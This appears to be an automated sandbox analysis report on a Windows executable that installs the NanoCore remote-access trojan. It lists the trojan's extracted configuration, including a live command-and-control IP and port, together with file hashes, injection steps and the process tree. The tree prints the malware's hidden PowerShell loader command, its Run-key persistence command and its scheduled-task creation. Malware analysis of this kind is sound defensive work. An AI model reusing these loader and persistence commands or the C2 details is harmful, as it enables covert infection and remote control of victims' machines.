Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
-
submitted
16-05-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
Resource
win7-20240221-en
General
-
Target
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
-
Size
689KB
-
MD5
e0dfee6241128b7395b5fd0d8f6ebe20
-
SHA1
a1351dfa6c71e46c155f43e91538af2ababa5c5a
-
SHA256
a7904a9abf1b208434c7e06b7d7c0d86ff150660b436eebd5d2a837c1bc51e21
-
SHA512
06c609efa598c9df65cd2339dfa96d66658030fe9066daa7936a93de36c9026d822a7692f90e94b107b5fd7c6744091d7de5d943289f9078fa4aff44ca08e3b2
-
SSDEEP
12288:BEwtNzCu2HjdSqvXO6KoDP46aJkOReOjDSIWzRgmYW9+:6y/2DB+8XfORecSISRNYW9+
Malware Config
Extracted
nanocore
1.2.2.0
184.75.223.235:7425
08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
activate_away_mode
true
-
backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-02-09T12:58:05.780785736Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
7425
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
184.75.223.235
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes: reg.exe, ImagingDevices.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dveskolen = "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\\Ionized\\').Arbejdspligt;%Shoresman% ($Devoto)" (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Subsystem = "C:\\Program Files (x86)\\SMTP Subsystem\\smtpss.exe" (ImagingDevices.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes: ImagingDevices.exe
- PID 2752 ImagingDevices.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: powershell.exe, ImagingDevices.exe
- PID 3064 powershell.exe
- PID 2752 ImagingDevices.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
- PID 3064 powershell.exe set thread context of PID 2752 ImagingDevices.exe
-
Drops file in Program Files directory 2 IoCs
Processes: ImagingDevices.exe
- File created: C:\Program Files (x86)\SMTP Subsystem\smtpss.exe (ImagingDevices.exe)
- File opened for modification: C:\Program Files (x86)\SMTP Subsystem\smtpss.exe (ImagingDevices.exe)
-
Drops file in Windows directory 1 IoCs
Processes: e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
- File opened for modification: C:\Windows\Ligaturers216\irkas.unm (e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe, schtasks.exe
- PID 448 schtasks.exe
- PID 2384 schtasks.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes: powershell.exe, ImagingDevices.exe
- PID 3064 powershell.exe (8 IoCs)
- PID 2752 ImagingDevices.exe (4 IoCs)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: ImagingDevices.exe
- PID 2752 ImagingDevices.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes: powershell.exe
- PID 3064 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: powershell.exe, ImagingDevices.exe
- Token: SeDebugPrivilege, PID 3064 powershell.exe
- Token: SeDebugPrivilege, PID 2752 ImagingDevices.exe
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes: e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe, powershell.exe, ImagingDevices.exe, cmd.exe
- PID 3452 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe wrote to memory of PID 3064 powershell.exe (3 IoCs)
- PID 3064 powershell.exe wrote to memory of PID 3288 cmd.exe (3 IoCs)
- PID 3064 powershell.exe wrote to memory of PID 2752 ImagingDevices.exe (5 IoCs)
- PID 2752 ImagingDevices.exe wrote to memory of PID 4364 cmd.exe (3 IoCs)
- PID 4364 cmd.exe wrote to memory of PID 620 reg.exe (3 IoCs)
- PID 2752 ImagingDevices.exe wrote to memory of PID 448 schtasks.exe (3 IoCs)
- PID 2752 ImagingDevices.exe wrote to memory of PID 2384 schtasks.exe (3 IoCs)
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe (depth 1)
Command: "C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe"
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command: "powershell.exe" -windowstyle hidden "$Hndelig=Get-Content 'C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.Ion';$Geocyclic=$Hndelig.SubString(53435,3);.$Geocyclic($Hndelig)"
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe (depth 3)
Command: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exe (depth 5)
Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
Command: "schtasks.exe" /create /f /tn "SMTP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmp304.tmp"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 4)
Command: "schtasks.exe" /create /f /tn "SMTP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp3EF.tmp"
- Creates scheduled task(s)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1)
Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1416 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eusrb2ns.kqo.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmp304.tmp
Filesize 1KB
MD5 71ead0a0a3d5f5ab1c6fe7e937fbb0a7
SHA1 5ce6d119d57d1e536f5f8fe9b88e84bff5bc65f4
SHA256 320e3d1c9de524bd09da80c102590ca1de02878947a5bd9cf6ce41ec80d627ef
SHA512 5ff26e793041c37dee51b336e4b82bfc42b5a132b5a1bb975c7e201bedb3a384f3c44ed560b800a0b0830d2eaebd671288ab47f06cfe553da5a99b29ebeab3d0
-
C:\Users\Admin\AppData\Local\Temp\tmp3EF.tmp
Filesize 1KB
MD5 0339b45ef206f4becc88be0d65e24b9e
SHA1 6503a1851f4ccd8c80a31f96bd7ae40d962c9fad
SHA256 3d568a47a8944a47f4aed6982755ac7ff7dda469cc1c81c213ecaa5d89de1f83
SHA512 c98f4513db34d50510dd986e0d812545c442bd5bef26932032b165759627fab4e00c95fe907ab3416a8a1042bfa77aa516c479f1ff7d1ec2f21ae66df8f72551
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\Appliceringernes.Bra
Filesize 327KB
MD5 3b52e8ccc5c3e79f2c3bd9878f7c72bd
SHA1 d341fa8bdab55d08c942d45bd0cd2cf11d5b26e4
SHA256 c5426f693d6484c5e42a66d03f3422587a4b328dc8432f305458d1e0f3e1ee78
SHA512 6c78f6d5f1e5e4f983718e78fca14bab3e17c753cabe36c2f4e95be0406acdd32d980e2328640acb9eba439c26b5d268a1fbcfc3b4d5abf7970064f5b286dd19
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.Ion
Filesize 52KB
MD5 1067aadf3627bd86f4048db52f577636
SHA1 682d902c4223a31fb3abf3236194b177813d662f
SHA256 0b4823813f85cbf0259d04a24fa6ee9dc00c612896201fdf1793928a3883c0d4
SHA512 d9331366473d373535cca3db7b364fe3371cdef889be61cd052249ee42d1d1aae8da696dc88e2094bfda8eda2cda1b6da36e16cf5e5f92d66296941ec6aca377
-
memory/2752-68-0x0000000020EE0000-0x0000000020EFE000-memory.dmp
Filesize 120KB
-
memory/2752-66-0x0000000020CE0000-0x0000000020CEA000-memory.dmp
Filesize 40KB
-
memory/2752-58-0x000000001EB70000-0x000000001EB7A000-memory.dmp
Filesize 40KB
-
memory/2752-67-0x0000000020CF0000-0x0000000020CFC000-memory.dmp
Filesize 48KB
-
memory/2752-57-0x0000000020D10000-0x0000000020DAC000-memory.dmp
Filesize 624KB
-
memory/2752-56-0x0000000020BD0000-0x0000000020C62000-memory.dmp
Filesize 584KB
-
memory/2752-52-0x0000000000A60000-0x0000000001CB4000-memory.dmp
Filesize 18.3MB
-
memory/2752-54-0x0000000000A60000-0x0000000000A9A000-memory.dmp
Filesize 232KB
-
memory/2752-69-0x0000000021900000-0x000000002190A000-memory.dmp
Filesize 40KB
-
memory/3064-17-0x00000000062F0000-0x0000000006644000-memory.dmp
Filesize 3.3MB
-
memory/3064-24-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-28-0x0000000007ED0000-0x0000000008474000-memory.dmp
Filesize 5.6MB
-
memory/3064-26-0x0000000006DF0000-0x0000000006E0A000-memory.dmp
Filesize 104KB
-
memory/3064-30-0x0000000008B00000-0x000000000917A000-memory.dmp
Filesize 6.5MB
-
memory/3064-31-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-25-0x0000000007880000-0x0000000007916000-memory.dmp
Filesize 600KB
-
memory/3064-33-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-34-0x0000000074FEE000-0x0000000074FEF000-memory.dmp
Filesize 4KB
-
memory/3064-35-0x0000000009180000-0x0000000009D95000-memory.dmp
Filesize 12.1MB
-
memory/3064-36-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-37-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-39-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-27-0x0000000006E40000-0x0000000006E62000-memory.dmp
Filesize 136KB
-
memory/3064-23-0x0000000006990000-0x00000000069DC000-memory.dmp
Filesize 304KB
-
memory/3064-55-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-22-0x0000000006900000-0x000000000691E000-memory.dmp
Filesize 120KB
-
memory/3064-4-0x0000000074FEE000-0x0000000074FEF000-memory.dmp
Filesize 4KB
-
memory/3064-11-0x0000000006280000-0x00000000062E6000-memory.dmp
Filesize 408KB
-
memory/3064-10-0x0000000006210000-0x0000000006276000-memory.dmp
Filesize 408KB
-
memory/3064-9-0x0000000005900000-0x0000000005922000-memory.dmp
Filesize 136KB
-
memory/3064-8-0x0000000005BE0000-0x0000000006208000-memory.dmp
Filesize 6.2MB
-
memory/3064-7-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-6-0x0000000074FE0000-0x0000000075790000-memory.dmp
Filesize 7.7MB
-
memory/3064-5-0x00000000032E0000-0x0000000003316000-memory.dmp
Filesize 216KB